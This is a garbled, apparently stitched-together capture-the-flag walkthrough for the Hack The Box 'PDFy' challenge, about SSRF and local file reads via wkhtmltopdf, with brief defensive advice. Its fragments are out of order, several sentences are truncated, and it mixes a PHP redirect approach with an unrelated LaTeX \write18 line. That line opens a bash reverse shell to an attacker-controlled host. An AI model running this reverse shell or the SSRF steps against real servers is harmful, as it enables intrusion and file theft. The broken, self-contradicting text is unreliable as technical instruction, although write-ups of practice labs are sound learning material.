PDFy HTB Writeup UPD

cat /root/root.txt

The server responds with a PDF file, which is placed at /static/pdfs/<random_hash>.pdf. This flow shows that the backend fetches the provided URL, converts the content into a PDF, and stores it for retrieval.

cURL, Burp Suite, Python3, Nginx / Apache (or a public VPS)

🔍 Phase 1: Information Gathering & Enumeration

Submit your payload URL: http:// /exploit.php .

PDFY - A Challenging PDF-themed Machine on Hack The Box

The initial scan reveals a web server running on port 80.

That’s rare in HTB writeups.

\immediate\write18/bin/bash -c "bash -i >& /dev/tcp/10.10.14.XX/5555 0>&1"

Preventing vulnerabilities like those found in PDFy requires a multi-layered defense:

Allowlisting: Only permit requests to specific, trusted domains.

Protocol Restriction: Block non-HTTP protocols like

Network Isolation

If you’ve been grinding through Hack The Box (HTB) machines, you’ve likely come across PDFy — a retired, medium-difficulty Linux box that focuses heavily on , PDF metadata exploitation, and abusing misconfigured binaries. The “PDFy HTB Writeup UPD” is a community-driven, updated walkthrough that aims to not only guide you through the root but also explain the why behind each step.

Server-Side Request Forgery (SSRF) & Local File Inclusion (LFI)

Target Binary Component: wkhtmltopdf

1. Initial Reconnaissance & Enumeration

Bookmark it, practice each step in your own lab, and try to explain the exploit to a friend. That’s how you’ll know you’ve truly mastered PDFy.

Create a PHP file (e.g., exploit.php) on an external server or a listening platform controlled by you. The code instructs any visiting client—including the vulnerable wkhtmltopdf binary—to look directly at a local file path:

Verify SSRF by receiving a "hit" on a controlled listener (like Webhook.site).

By inspecting the PDF metadata or generating an error (e.g., submitting a local address), you can identify that the backend uses wkhtmltopdf to perform the conversion [26].

2. Exploitation (SSRF)


Use SSRF to interact with this internal service: